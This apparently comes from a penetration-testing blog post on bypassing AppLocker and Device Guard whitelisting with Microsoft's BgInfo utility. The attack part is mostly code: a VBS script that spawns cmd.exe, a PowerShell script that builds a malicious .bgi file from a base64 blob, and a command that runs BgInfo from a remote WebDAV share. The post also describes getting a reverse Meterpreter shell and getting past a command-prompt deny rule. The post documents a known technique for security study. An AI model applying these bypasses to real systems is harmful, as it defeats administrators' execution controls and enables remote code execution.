BgInfo is a Microsoft utility that displays automatically system information about the computer directly in the desktop background. It is one of the utilities that system administrators use very often and it can be found in some systems.

Oddvar Moe discovered that BgInfo can be utilized to bypass AppLocker and Device Guard restrictions since it has the ability to execute VBS scripts. As a proof of concept he wrote a simple script that can call and execute command prompt.

cmd.vbs

strProgram = "cmd.exe"
strPath    = "C:\windows\system32" 

Set fso = CreateObject("Scripting.FileSystemObject")
strCommand = fso.BuildPath(strPath, strProgram) 

Set app = CreateObject("Shell.Application")
app.ShellExecute strCommand, , strPath, , 1  

echo "pentestlab"

From BgInfo a custom field needs to be added that it will point to the cmd.vbs script.

BgInfo Bypass - Command Prompt
BgInfo AppLocker Bypass – Configuration

From the moment that the OK button is pressed the VBS code will be executed and a command prompt will open.

BgInfo Bypass Command Prompt
BgInfo Bypass – Command Prompt

Generating BGI Files

The BgInfo configuration can be saved as .bgi which means that the cmd.vbs can executed automatically without creating a new custom field every time that BgInfo is running.

The following powershell script will generate a BGI file which will contain the path that the cmd.vbs is located. However instead of cmd.vbs it can be any script.

$VbsPath="C:\test\cmd.vbs"
$Length=$VbsPath.Length+2

$fileContent = "CwAAAEJhY2tncm91bmQABAAAAAQAAAAAAAAACQAAAFBvc2l0aW9uAAQAAAAEAAAA/gMAAAgAAABNb25pdG9yAAQAAAAEAAAAXAQAAA4AAABUYXNrYmFyQWRqdXN0AAQAAAAEAAAAAQAAAAsAAABUZXh0V2lkdGgyAAQAAAAEAAAAwHsAAAsAAABPdXRwdXRGaWxlAAEAAAASAAAAJVRlbXAlXEJHSW5mby5ibXAACQAAAERhdGFiYXNlAAEAAAABAAAAAAwAAABEYXRhYmFzZU1SVQABAAAABAAAAAAAAAAKAAAAV2FsbHBhcGVyAAEAAAABAAAAAA0AAABXYWxscGFwZXJQb3MABAAAAAQAAAACAAAADgAAAFdhbGxwYXBlclVzZXIABAAAAAQAAAABAAAADQAAAE1heENvbG9yQml0cwAEAAAABAAAAAAAAAAMAAAARXJyb3JOb3RpZnkABAAAAAQAAAAAAAAACwAAAFVzZXJTY3JlZW4ABAAAAAQAAAABAAAADAAAAExvZ29uU2NyZWVuAAQAAAAEAAAAAAAAAA8AAABUZXJtaW5hbFNjcmVlbgAEAAAABAAAAAAAAAAOAAAAT3BhcXVlVGV4dEJveAAEAAAABAAAAAAAAAAEAAAAUlRGAAEAAADvAAAAe1xydGYxXGFuc2lcYW5zaWNwZzkzNlxkZWZmMFxkZWZsYW5nMTAzM1xkZWZsYW5nZmUyMDUye1xmb250dGJse1xmMFxmbmlsXGZjaGFyc2V0MTM0IEFyaWFsO319DQp7XGNvbG9ydGJsIDtccmVkMjU1XGdyZWVuMjU1XGJsdWUyNTU7fQ0KXHZpZXdraW5kNFx1YzFccGFyZFxmaS0yODgwXGxpMjg4MFx0eDI4ODBcY2YxXGxhbmcyMDUyXGJccHJvdGVjdFxmMFxmczI0IDx2YnM+XHByb3RlY3QwXHBhcg0KXHBhcg0KfQ0KAAALAAAAVXNlckZpZWxkcwAAgACAAAAAAAQAAAB2YnMAAQAAAA=="
$fileContentBytes = [System.Convert]::FromBase64String($fileContent)
[System.IO.File]::WriteAllBytes("test1.bgi",$fileContentBytes)

$fs=new-object io.filestream "test1.bgi",open
$fs.seek(0,2)| Out-Null
$fs.writebyte($Length)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x34)
$fs.flush()
$fs.close()

$VbsPath | Out-File -Encoding ascii -Append test1.bgi

$fs=new-object io.filestream "test1.bgi",open
$fs.seek(-2,2)| Out-Null
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x01)
$fs.writebyte(0x80)
$fs.writebyte(0x00)
$fs.writebyte(0x80)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.flush()
$fs.close()

From the moment that the BGI file will executed the cmd.vbs will run and a command prompt will be opened.

BgInfo and Command Prompt
BgInfo & Command Prompt

Alternatively the .BGI file can be executed via Run or remotely from a WebDAV server.

C:\BgInfo\Bginfo.exe test1.bgi /popup /nolicprompt
“\\10.10.10.10\webdav\bginfo.exe” bginfo.bgi /popup /nolicprompt
Execute BGI File via Run
Execute BGI FIle via Run

Meterpreter

Based on the work that Cneeliz did with weaponized VBS scripts that contain Metasploit payloads it is possible to utilize them in order to get a reverse Meterpreter shell through BgInfo utility.

BgInfo - VBSMeter
BgInfo – VBSMeter

 

Meterpreter - Bginfo
Meterpreter – BgInfo

Command Prompt

It is also possible in an environment that the command prompt is locked by a deny rule to still run a command prompt by exploiting weak path rules and modifying the script properly to execute Didier Stevens version of CMD.

The first two lines of the cmd.vbs script need to be modified in order to execute the binary in a location that a user has read and write access by default.

BgInfo - Run CMD
BgInfo – Run CMD

As a result the command prompt will opened bypassing the AppLocker rule.

Running Command Prompt via BgInfo
Running Command Prompt via BgInfo

Resources

Clarification – BGInfo 4.22 – AppLocker still vulnerable

Bypassing Application Whitelisting with BGInfo

https://github.com/3gstudent/bgi-creater

https://github.com/Cn33liz/VBSMeter/blob/master/VBSMeter.vbs

1 Comment

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s